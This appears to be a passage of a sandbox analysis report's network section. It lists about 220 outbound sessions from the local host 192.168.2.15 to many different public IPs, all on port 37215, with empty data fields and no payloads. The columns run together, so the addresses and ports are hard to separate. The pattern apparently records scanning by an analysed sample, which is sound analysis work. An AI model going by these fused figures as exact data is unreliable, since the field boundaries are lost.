                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21449192.168.2.1534374186.94.34.19037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21450192.168.2.1541070212.179.11.21037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21451192.168.2.1542930181.106.228.6337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21452192.168.2.1540986181.163.24.4137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21453192.168.2.1549002121.10.87.21337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21454192.168.2.154380431.206.64.1137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21455192.168.2.1534060102.44.3.13237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21456192.168.2.1539622102.52.227.10337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21457192.168.2.1536654222.210.125.3937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21458192.168.2.1552714121.72.130.5237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21459192.168.2.1560872102.193.117.24737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21460192.168.2.153662031.61.129.5337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21461192.168.2.1556882186.25.54.14137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21462192.168.2.1542158156.212.96.11837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21463192.168.2.1551702156.209.69.4737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21464192.168.2.153988288.112.225.16837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21465192.168.2.155407445.201.204.937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21466192.168.2.153377037.46.93.21737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21467192.168.2.1542272102.21.86.19737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21468192.168.2.1547554197.103.179.5737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21469192.168.2.1540446197.231.177.7537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21470192.168.2.1534200122.84.146.3037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21471192.168.2.1544132181.85.182.5437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21472192.168.2.1553248186.253.184.15937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21473192.168.2.1554500181.159.116.19737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21474192.168.2.1538476157.153.0.8637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21475192.168.2.153409041.201.219.1937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21476192.168.2.1544554197.165.208.24237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21477192.168.2.153460841.41.229.8237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21478192.168.2.153810037.184.234.14137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21479192.168.2.155596245.242.79.3837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21480192.168.2.153803845.51.60.9337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21481192.168.2.1534200186.119.87.2437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21482192.168.2.1543860102.160.22.15237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21483192.168.2.1552904122.236.28.22837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21484192.168.2.1542060122.134.52.4837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21485192.168.2.1546632138.55.58.23237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21486192.168.2.1539728186.197.190.9637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21487192.168.2.1559292138.32.167.9137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21488192.168.2.1534722138.15.171.4037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21489192.168.2.1541828102.131.82.20637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21490192.168.2.154796445.69.103.21237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21491192.168.2.1551956186.128.124.23937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21492192.168.2.1554382190.50.146.17037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21493192.168.2.1558168121.146.44.11437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21494192.168.2.153356037.127.251.15237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21495192.168.2.1533198222.189.222.1837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21496192.168.2.154981037.19.168.23837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21497192.168.2.1536728156.174.190.13437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21498192.168.2.155620294.134.77.13837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21499192.168.2.1547448157.239.105.17837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21500192.168.2.1558744102.174.4.21637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21501192.168.2.1539742197.144.68.17937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21502192.168.2.1541018156.20.152.16537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21503192.168.2.154115645.57.142.13337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21504192.168.2.155370894.77.188.8737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21505192.168.2.1548982181.234.82.237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21506192.168.2.1539814222.59.103.8937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21507192.168.2.154057431.110.65.3337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21508192.168.2.1542844190.72.241.7237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21509192.168.2.1549430157.12.130.14037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21510192.168.2.1549552181.187.61.237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21511192.168.2.156045645.159.155.3737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21512192.168.2.155492094.60.96.18437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21513192.168.2.153565841.228.46.16637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21514192.168.2.1548270181.252.184.9637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21515192.168.2.1538544156.152.216.16737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21516192.168.2.1549616186.97.17.14037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21517192.168.2.153642037.13.148.14137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21518192.168.2.1557058181.216.37.20137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21519192.168.2.155642876.82.130.837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21520192.168.2.153759837.223.19.18337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21521192.168.2.1542804157.57.74.15237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21522192.168.2.1536316138.127.232.16537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21523192.168.2.154193894.25.174.20337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21524192.168.2.1556546181.162.184.25037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21525192.168.2.155771637.212.64.16337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21526192.168.2.1542694197.17.29.22737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21527192.168.2.155893031.175.201.22137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21528192.168.2.155649694.62.39.9637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21529192.168.2.155645241.137.127.24037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21530192.168.2.1548464190.154.223.22637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21531192.168.2.1549752181.39.46.25137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21532192.168.2.1558062138.36.196.25137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21533192.168.2.153840441.245.114.9037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21534192.168.2.1537964138.0.228.5237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21535192.168.2.1546084156.21.234.3137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21536192.168.2.1548328156.5.157.14837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21537192.168.2.155921824.51.122.20337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21538192.168.2.1535370121.43.176.637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21539192.168.2.1551970121.15.111.16937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21540192.168.2.1534214156.253.24.9437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21541192.168.2.1543112190.251.73.637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21542192.168.2.1542530156.80.169.24037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21543192.168.2.154620245.239.35.837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21544192.168.2.1546216197.48.28.13337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21545192.168.2.1556062157.250.136.10837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21546192.168.2.1555620122.9.107.9437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21547192.168.2.153473894.248.167.10337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21548192.168.2.1541018186.128.228.21937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21549192.168.2.155800431.204.207.15037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21550192.168.2.1558952222.239.36.15237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21551192.168.2.1539028186.42.90.22337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21552192.168.2.1558266122.129.125.19137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21553192.168.2.154270461.98.83.14137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21554192.168.2.1553686121.111.128.3337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21555192.168.2.1558812197.119.152.7337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21556192.168.2.1551662102.112.238.11537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21557192.168.2.1548408197.34.160.17337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21558192.168.2.153540241.80.194.2537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21559192.168.2.1535306102.39.28.12637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21560192.168.2.1541936102.135.152.12137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21561192.168.2.153549445.155.112.12837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21562192.168.2.1552254156.27.77.7037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21563192.168.2.1556262156.90.138.3237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21564192.168.2.1553124157.88.85.12937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21565192.168.2.1540750190.173.182.5437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21566192.168.2.1542866156.251.17.7737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21567192.168.2.155616694.29.249.23737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21568192.168.2.1552124102.95.31.21937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21569192.168.2.1543916138.150.190.2237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21570192.168.2.155402659.136.186.17637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21571192.168.2.156023694.115.110.12637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21572192.168.2.155020294.119.178.20937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21573192.168.2.153960094.38.181.2237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21574192.168.2.1556262157.41.197.20437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21575192.168.2.1537066121.78.95.9737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21576192.168.2.1551570180.226.178.2637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21577192.168.2.1536906102.44.158.1737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21578192.168.2.153877441.80.33.22637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21579192.168.2.154559841.89.222.20137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21580192.168.2.1539410186.99.109.2537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21581192.168.2.1539374138.24.181.23037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21582192.168.2.154398431.39.47.1737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21583192.168.2.155270031.168.59.9237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21584192.168.2.1542202222.14.203.17837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21585192.168.2.1545434197.40.14.7037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21586192.168.2.1536302156.43.152.3837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21587192.168.2.155265841.33.0.8437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21588192.168.2.1537542197.178.92.3137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21589192.168.2.153480694.8.48.6537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21590192.168.2.1557012121.144.153.24037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21591192.168.2.155083241.248.191.11037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21592192.168.2.1555306197.117.236.437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21593192.168.2.1551344102.154.130.1737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21594192.168.2.1557006181.153.24.11337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21595192.168.2.1556220122.65.95.21437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21596192.168.2.1552424181.172.46.15937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21597192.168.2.154216245.145.52.23637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21598192.168.2.155399037.149.130.19837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21599192.168.2.153585237.254.244.15937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21600192.168.2.154989237.18.43.837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21601192.168.2.1534788157.118.170.24037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21602192.168.2.155041271.250.2.1237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21603192.168.2.1551032190.63.247.4637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21604192.168.2.153427831.103.33.22637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21605192.168.2.1554366157.81.214.15737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21606192.168.2.1537804197.50.234.5737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21607192.168.2.1537204157.194.190.2637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21608192.168.2.1536006157.199.74.17737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21609192.168.2.155442237.10.126.14937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21610192.168.2.154049245.91.87.4937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21611192.168.2.1534454122.81.15.1737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21612192.168.2.1554258187.151.229.937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21613192.168.2.1545638121.33.180.23237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21614192.168.2.156057894.234.86.1837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21615192.168.2.1534350102.138.135.23337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21616192.168.2.1544576221.131.71.8737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21617192.168.2.153892231.124.30.5737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21618192.168.2.1549380181.89.170.22637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21619192.168.2.153780894.11.216.23237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21620192.168.2.1537560190.38.36.11437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21621192.168.2.1534332167.83.13.7737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21622192.168.2.1536348216.134.227.10837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21623192.168.2.1547182190.196.197.4237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21624192.168.2.154474437.200.220.2337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21625192.168.2.154564445.186.115.6037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21626192.168.2.1552868157.183.174.21037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21627192.168.2.155452437.15.97.8937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21628192.168.2.1552158186.8.18.18737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21629192.168.2.1539824190.51.105.1937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21630192.168.2.155961231.222.124.2237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21631192.168.2.1552552102.165.164.25137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21632192.168.2.1540332157.120.32.14537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21633192.168.2.1555534156.172.97.13337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21634192.168.2.1552356157.35.57.22237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21635192.168.2.1534340190.89.29.11037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21636192.168.2.1560604190.21.117.24237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21637192.168.2.1538132121.231.234.23937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21638192.168.2.155154894.168.181.10737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21639192.168.2.153656437.149.208.1037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21640192.168.2.154863241.196.97.10137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21641192.168.2.1552290122.147.99.2837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21642192.168.2.1540174181.87.209.23337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21643192.168.2.1555558222.29.129.10437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21644192.168.2.1548178157.93.224.13837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21645192.168.2.155062637.203.132.9737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21646192.168.2.1551070190.122.158.17837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21647192.168.2.1554338190.79.128.11237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21648192.168.2.1558000113.77.83.14037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21649192.168.2.1549240156.60.180.14637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21650192.168.2.1556136197.36.23.3637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21651192.168.2.1554508102.107.239.22637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21652192.168.2.1548538190.2.183.3737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21653192.168.2.1558570186.174.69.9337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21654192.168.2.1553180156.100.89.19037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21655192.168.2.1536092181.89.114.7337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21656192.168.2.154495894.124.78.16437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21657192.168.2.1539732156.150.122.17937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21658192.168.2.1559184138.122.28.4037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21659192.168.2.1551004157.108.126.237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21660192.168.2.1551574121.0.174.14437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21661192.168.2.1546178138.125.26.437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21662192.168.2.1560970222.72.103.14037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21663192.168.2.1553880181.4.169.22537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21664192.168.2.1534886121.244.204.6937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21665192.168.2.1542024181.210.47.11637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21666192.168.2.155866494.254.214.9337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
